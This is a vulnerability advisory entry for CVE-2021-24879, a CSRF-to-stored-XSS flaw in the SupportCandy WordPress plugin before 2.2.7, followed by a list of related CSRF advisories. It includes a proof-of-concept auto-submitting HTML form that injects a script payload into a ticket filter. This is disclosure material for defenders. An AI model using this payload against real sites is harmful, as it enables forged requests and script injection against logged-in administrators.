WordPress Plugin Vulnerabilities

SupportCandy < 2.2.7 - CSRF to Cross-Site Scripting

Description

The plugin does not have CSRF check in the wpsc_tickets AJAX action, nor has any sanitisation or escaping in some of the filter fields which could allow attackers to make a logged in user having access to the ticket lists dashboard set an arbitrary filter (stored in their cookies) with an XSS payload in it.

Proof of Concept

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST" id="csrf">
<input type="hidden" name="action" value="wpsc_tickets">
<input type="hidden" name="setting_action" value="set_custom_filter">
<input type="hidden" name="page_no" value="1">
<input type="hidden" name="custom_filter[s]" value=""><script>alert(/XSS/)</script>">
</form><script>csrf.submit()</script>

Go to https://example.com/wp-admin/admin.php?page=wpsc-tickets to trigger the XSS

Affects Plugins

Plugin icon
supportcandy
Fixed in 2.2.7

References

CVE
CVE-2021-24879

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.7 (medium)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
6dfb4f61-c8cb-40ad-812f-139482be0fb4

Timeline

Publicly Published
2022-01-05 (about 2 years ago)
Added
2022-01-05 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2023-02-20
Title
Books Gallery < 4.4.9 - CSRF
Published
2023-12-27
Title
Duplicator < 1.5.7.1 - Settings Removal via CSRF
Published
2014-12-18
Title
Tweetscribe <= 1.1 - Multiple CSRF
Published
2020-04-02
Title
Woocommerce Subscriptions < 3.0.3 - CSRF to Cancel/Re-Activate Subscription
Published
2023-08-28
Title
Maintenance Switch <= 1.5.2 - Theme Files Creation/Deletion via CSRF